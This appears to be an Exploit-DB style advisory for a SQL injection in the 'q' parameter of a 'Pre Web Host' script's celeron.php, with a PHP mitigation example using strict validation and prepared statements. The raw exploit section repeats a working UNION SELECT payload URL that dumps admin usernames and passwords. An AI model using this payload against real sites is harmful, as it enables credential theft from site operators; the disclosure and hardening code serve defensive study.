Vendor: N/A
By: Mr.Benladen
CVSS: 7,5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: N/A
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: No
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

Pre Web Host sql inj3ction Vulnerability

An attacker can inject malicious SQL queries into the vulnerable web application by manipulating the 'q' parameter of the 'celeron.php' script. For example, an attacker can send the following request to the vulnerable application: http://[site]/celeron.php?q=-4+union+select+1,2,concat%28username,0x3e,pass%29+from+admin--

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.
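
One way to apply the mitigation above, as an added example that is not part of the original advisory or the vendor's code: validate `q` as an integer, then bind it in a prepared statement. The `plans` table, its columns, the helper names and the sample rows are assumptions constructed for the demo, since the real celeron.php source and schema are not shown on this page.

```php
<?php
// Added example: hardened lookup for a numeric `q` parameter.
// Table `plans` and its columns are hypothetical (the real schema is unknown).
declare(strict_types=1);

function parse_id(?string $raw): ?int
{
    // Accept only a canonical positive decimal integer (max 9 digits);
    // signs, whitespace, suffixes and SQL text are all rejected.
    if ($raw === null || !preg_match('/\A[1-9][0-9]{0,8}\z/', $raw)) {
        return null;
    }
    return (int) $raw;
}

function find_plan(PDO $db, ?string $raw): ?array
{
    $id = parse_id($raw);
    if ($id === null) {
        return null; // caller should answer HTTP 400 without running a query
    }
    // Vulnerable pattern, for contrast only:
    //   $db->query("SELECT id, name, price FROM plans WHERE id = $raw");
    $stmt = $db->prepare('SELECT id, name, price FROM plans WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed demo data in an in-memory SQLite database (requires pdo_sqlite).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE plans (id INTEGER PRIMARY KEY, name TEXT, price TEXT)');
$db->exec('CREATE TABLE admin (username TEXT, pass TEXT)');
$db->exec("INSERT INTO plans VALUES (4, 'Basic', '30 USD')");
$db->exec("INSERT INTO admin VALUES ('root', 'constructed-hash')");

// Inputs: a valid id, then the two request values quoted in the advisory (URL-decoded).
$inputs = [
    '4',
    '4sQL',
    '-4 union select 1,2,concat(username,0x3e,pass) from admin--',
];
foreach ($inputs as $q) {
    $row = find_plan($db, $q);
    printf("%-62s => %s\n", $q, $row === null ? 'rejected' : json_encode($row));
}
```

Only the first input reaches the database; the other two fail validation, and even if validation were bypassed the bound parameter would be compared as a value rather than parsed as SQL.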

Exploit-DB raw data:

# EDB-ID: 1310
# CVE: ()
# OSVDB-ID: ()
# Author: Mr.Benladen
# Published: 2010-06-07
# Verified: No

[~]######################################### InformatioN
#############################################[~]

[~] Title     : Pre Web Host sql inj3ction Vulnerability
[~] Author    : Mr.Benladen
[~] Homepage  : http://www.joomlaservice.info Or http://www.dz4all.com
[~] Vendor    : http://www.hostfriendz.com/detail.php?spid=54
[~]           : 30$
[~] Email     : MaFiadu48@hotmail.fr
[~] Dork      : allinurl: In YoUr Dream


[~]######################################### ExploiT
#############################################[~]

[~] For Exemple :

SQL iS hERE http://127.0.0.1/celeron.php?q=4sQL


http://127.0.0.1/celeron.php?q=-4+union+select+1,2,concat(username,0x3e,pass)+from+admin--


demo:
http://[site]/celeron.php?q=-4+union+select+1,2,concat%28username,0x3e,pass%29+from+admin--

[~]#########################################  ThankS To
############################################[~]

[~] Special Thanks To My Best FriendS :

Federal7 khallidmoro,dr.prorat,blackroot,Ra3ch,Zioon From ukarnia- and  all
Morocan hackerz

Big Gr33tz to anti tr4ck3r from www.sec-royal.com

[~] Morocan h4ckerz

[~]#########################################  FinisH :D
##############################